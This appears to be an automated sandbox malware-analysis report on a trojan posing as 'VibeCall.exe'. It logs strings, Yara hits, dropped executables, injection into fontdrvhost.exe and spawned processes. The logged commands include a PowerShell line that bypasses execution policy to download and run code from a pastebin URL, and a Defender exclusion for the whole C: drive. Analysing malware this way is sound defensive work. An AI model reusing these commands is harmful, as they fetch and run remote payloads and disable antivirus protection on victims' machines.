                      Source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
                      Source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
                      Source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/downloadCommon
                      Source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/info
                      Source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/sdk-not-found
                      Source: powershell.exe, 00000002.00000002.1802031537.0000024D0F061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1802434498.000001DC5C2F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1939098908.000001449F6A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: fontdrvhost.exeString found in binary or memory: https://cloudflare-dns.com/dns-query
                      Source: powershell.exe, 00000009.00000002.2055618666.00000144AF713000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000009.00000002.2055618666.00000144AF713000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000009.00000002.2055618666.00000144AF713000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: VibeCall.exe, 00000000.00000003.1706005579.000001CCB0BB2000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1706619833.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1705881056.000001CCB0BB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.mic
                      Source: VibeCall.exe, 00000000.00000003.1705881056.000001CCB0BB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.microsoft.c
                      Source: powershell.exe, 00000009.00000002.1939098908.000001449F8C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000004.00000002.1802434498.000001DC5D44B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000009.00000002.1937222255.000001449F595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
                      Source: powershell.exe, 00000002.00000002.1866786065.0000024D1F0D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1864011647.000001DC6C4A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1802434498.000001DC5D94A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1864011647.000001DC6C363000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2055618666.00000144AF713000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000004.00000002.1802434498.000001DC5D44B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                      Source: powershell.exe, 00000004.00000002.1802434498.000001DC5D94A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/QE03kE1s
                      Source: powershell.exe, 00000004.00000002.1801659336.000001DC5A850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/qe03ke1s
                      Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.entrust.net/rpa0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49740 version: TLS 1.2
                      Source: aisolution_vibecall_a.exe, 0000000E.00000003.2442071082.0000000003CE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_78213d8d-3
                      Source: aisolution_vibecall_a.exe, 0000000E.00000003.2442071082.0000000003CE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_60fd853b-f
                      Source: Yara matchFile source: 18.3.videosolution_vibecall_b.exe.3e90000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.3.fontdrvhost.exe.5510000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.3.aisolution_vibecall_a.exe.3ce0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.3.aisolution_vibecall_a.exe.3ac0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.3.aisolution_vibecall_a.exe.3ce0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.3.fontdrvhost.exe.4a50000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.3.fontdrvhost.exe.51f0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.3.fontdrvhost.exe.5410000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.3.contry_solution_vibecall_e.exe.3a60000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.3.fontdrvhost.exe.4c70000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.3.contry_solution_vibecall_e.exe.3c80000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.3.fontdrvhost.exe.52f0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.3.fontdrvhost.exe.4c70000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.videosolution_vibecall_b.exe.3e90000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.videosolution_vibecall_b.exe.3c70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.3.contry_solution_vibecall_e.exe.3a60000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.videosolution_vibecall_b.exe.3c70000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.videosolution_vibecall_b.exe.3c70000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.3.contry_solution_vibecall_e.exe.3c80000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.3.fontdrvhost.exe.5510000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000003.2593226340.0000000003E90000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.2479874720.0000000003C80000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.2442071082.0000000003CE0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.2459826621.0000000004C70000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2592963107.0000000003C70000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000003.2600818317.0000000005510000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000003.2600463624.00000000052F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.2441848134.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.2479321199.0000000003A60000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.2457252021.0000000004A50000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.2488297970.0000000005410000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.2487685333.00000000051F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: aisolution_vibecall_a.exe PID: 8116, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: contry_solution_vibecall_e.exe PID: 8136, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 31_2_056EC3B9 CreateEventA,NtDeviceIoControlFile,WaitForSingleObject,GetLastError,CloseHandle,WSASetLastError,CloseHandle,WSASetLastError,31_2_056EC3B9
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 37_2_0000025F79D615C0 NtAcceptConnectPort,37_2_0000025F79D615C0
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 37_2_0000025F79D60AC8 NtAcceptConnectPort,NtAcceptConnectPort,37_2_0000025F79D60AC8
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 37_2_0000025F79D61CF4 NtAcceptConnectPort,CloseHandle,37_2_0000025F79D61CF4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 37_2_0000025F79D61AA4 NtAcceptConnectPort,NtAcceptConnectPort,37_2_0000025F79D61AA4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 45_2_0000026D37E91CF4 NtAcceptConnectPort,CloseHandle,45_2_0000026D37E91CF4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 45_2_0000026D37E90AC8 NtAcceptConnectPort,NtAcceptConnectPort,45_2_0000026D37E90AC8
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 45_2_0000026D37E915C0 NtAcceptConnectPort,45_2_0000026D37E915C0
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 45_2_0000026D37E91AA4 NtAcceptConnectPort,NtAcceptConnectPort,45_2_0000026D37E91AA4
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 31_2_056EC3B9: CreateEventA,NtDeviceIoControlFile,WaitForSingleObject,GetLastError,CloseHandle,WSASetLastError,CloseHandle,WSASetLastError,31_2_056EC3B9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B5430E92_2_00007FFD9B5430E9
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_013BF13B14_3_013BF13B
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_013C117014_3_013C1170
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_013CCC2514_3_013CCC25
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_013BC09A14_3_013BC09A
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_013C6F8914_3_013C6F89
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_013BC3DC14_3_013BC3DC
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_013C264D14_3_013C264D
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 15_3_0162117015_3_01621170
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 15_3_0161F13B15_3_0161F13B
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 15_3_0162CC2515_3_0162CC25
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 15_3_0161C09A15_3_0161C09A
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 15_3_0161C3DC15_3_0161C3DC
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 15_3_01626F8915_3_01626F89
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 15_3_0162264D15_3_0162264D
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeCode function: 18_3_016681D218_3_016681D2
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeCode function: 18_3_0165C23118_3_0165C231
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeCode function: 18_3_0165C40018_3_0165C400
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 31_2_056FD5A931_2_056FD5A9
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 31_2_056FFC0231_2_056FFC02
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 31_2_056E94D031_2_056E94D0
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 31_2_056FCF7E31_2_056FCF7E
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 31_2_056F866031_2_056F8660
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 31_2_056F89ED31_2_056F89ED
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 31_2_056E91CA31_2_056E91CA
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 31_2_056F318B31_2_056F318B
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 31_2_0570104C31_2_0570104C
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 31_2_056FDB4531_2_056FDB45
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 31_2_056FD22931_2_056FD229
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 37_2_0000025F79D60C7037_2_0000025F79D60C70
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 45_2_0000026D37E90C7045_2_0000026D37E90C70
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: String function: 01617FB0 appears 38 times
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: String function: 013B7FB0 appears 38 times
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeCode function: String function: 0165CD90 appears 33 times
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 652
                      Source: VibeCall.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                      Source: aisolution_vibecall_a.exe.0.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: aisolution_vibecall_a.exe.0.drStatic PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
                      Source: contry_solution_vibecall_e.exe.0.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: contry_solution_vibecall_e.exe.0.drStatic PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
                      Source: contry_solution_vibecall_e.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: soundsolution_vibecall_c.exe.0.drStatic PE information: Resource name: BIN type: PE32+ executable (console) x86-64, for MS Windows
                      Source: soundsolution_vibecall_c.exe.0.drStatic PE information: Resource name: BIN type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                      Source: soundsolution_vibecall_c.exe.0.drStatic PE information: Resource name: BIN type: PE32+ executable (console) Aarch64, for MS Windows
                      Source: soundsolution_vibecall_c.exe.0.drStatic PE information: Resource name: BIN type: PE32+ executable (DLL) (GUI) Aarch64, for MS Windows
                      Source: videosolution_vibecall_b.exe.0.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: videosolution_vibecall_b.exe.0.drStatic PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
                      Source: VibeCall.exe, 00000000.00000000.1698594920.00007FF735F42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemscordaccore.dll@ vs VibeCall.exe
                      Source: VibeCall.exe, 00000000.00000000.1698594920.00007FF735F42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVibeCall.dll2 vs VibeCall.exe
                      Source: classification engineClassification label: mal96.troj.evad.winEXE@35/21@5/9
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\Downloads\soundsolution_vibecall_c.exeJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-99e96d32-cf93-bab661-d67703b36bf3}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-dd899bff-6062-c92311-31f6a4e226f8}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7288:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4e5bfc57-9dd8-f68e5-2d765d85c0d6}
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7748
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\AppData\Local\Temp\2xejzszc.hcdJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\VibeCall.exe "C:\Users\user\Desktop\VibeCall.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe "C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe "C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Downloads\soundsolution_vibecall_c.exe "C:\Users\user\Downloads\soundsolution_vibecall_c.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Downloads\videosolution_vibecall_b.exe "C:\Users\user\Downloads\videosolution_vibecall_b.exe"
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 652
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 660
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8136 -s 664
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8136 -s 684
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\fontdrvhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7748 -s 136
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 500
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 376
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe "C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe "C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Downloads\soundsolution_vibecall_c.exe "C:\Users\user\Downloads\soundsolution_vibecall_c.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Downloads\videosolution_vibecall_b.exe "C:\Users\user\Downloads\videosolution_vibecall_b.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: icu.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wshunix.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
